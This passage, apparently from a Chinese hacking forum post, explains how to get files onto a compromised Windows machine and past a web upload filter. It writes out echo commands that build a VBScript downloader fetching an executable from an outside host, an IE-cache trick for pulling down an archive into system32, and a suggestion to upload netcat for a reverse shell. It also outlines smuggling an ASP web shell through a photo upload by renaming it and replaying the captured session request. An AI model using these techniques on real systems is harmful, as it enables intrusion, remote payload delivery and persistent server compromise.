3.uudecode a 
文件复原,然后chmod即可 

3脚本是非常好的东西，只要把源码保存到一个文件中就能运行。所以在shell下，用 
echo语句直接写到一个文件中，在用相应的解释程序执行就可以啦。这里是一个程序 
实例的简化: 
echo Set xPost = CreateObject("Microsoft.XMLHTTP") >167168.vbs 
echo xPost.Open "GET","http://167168.meibu.com/srv.exe";;,0 >>167168.vbs 
echo xPost.Send() >>167168.vbs 
echo Set sGet = CreateObject("ADODB.Stream") >>167168.vbs 
echo sGet.Mode = 3 >>167168.vbs 
echo sGet.Type = 1 >>167168.vbs 
echo sGet.Open() >>167168.vbs 
echo sGet.Write(xPost.responseBody) >>167168.vbs 
echo sGet.SaveToFile "srv.exe",2 >>167168.vbs 
然后执行cscript 167168.vbs就可以啦.其中，http://167168.meibu.com/srv.exe改成你放 
文件的网站路径，srv.exe可以改成保存文件的路径。 

4.start its:http://167168.meibu.com/ca.rar （看清楚，小心论坛自动加的标签） 
cd "C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\" （假设系统装在c盘，且当前环境是SYSTEM。如果是用户环境，修改Default User为该用户名） 
dir /s ca[1].rar 
然后会显示ca[1].rar的具体位置，比如C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5QMVC11H\ca[1].rar 
最后： 
copy 0QMVC11H\ca[1].rar c:\winnt\system32\ca.rar 
del 0QMVC11H\ca[1].rar 

还有可以用EXE2BAT转换成批处理，再上传，这种方法只限于小文件，文件太长粘贴时会出错，传个NC做反向连接是不错的选择。
最近我还遇见一种校友录系统，只有注册后再能上传照片（SESSION），我注册后发现可以上传任意文件，可是只能解析图片类型的后缀，这种情况应该是在服务端又加了一层JSP认正，如果用本地提交可以绕过JSP认正，可是没有登陆，第一层SESSION验证就不会通过了，上传思路是把ASP文件改成JPG后缀上传，然后抓包，这里的数据包已经包含SESSION值了，再修改后缀为ASP，用NC提交，原理就是这样，具体测试在进行中..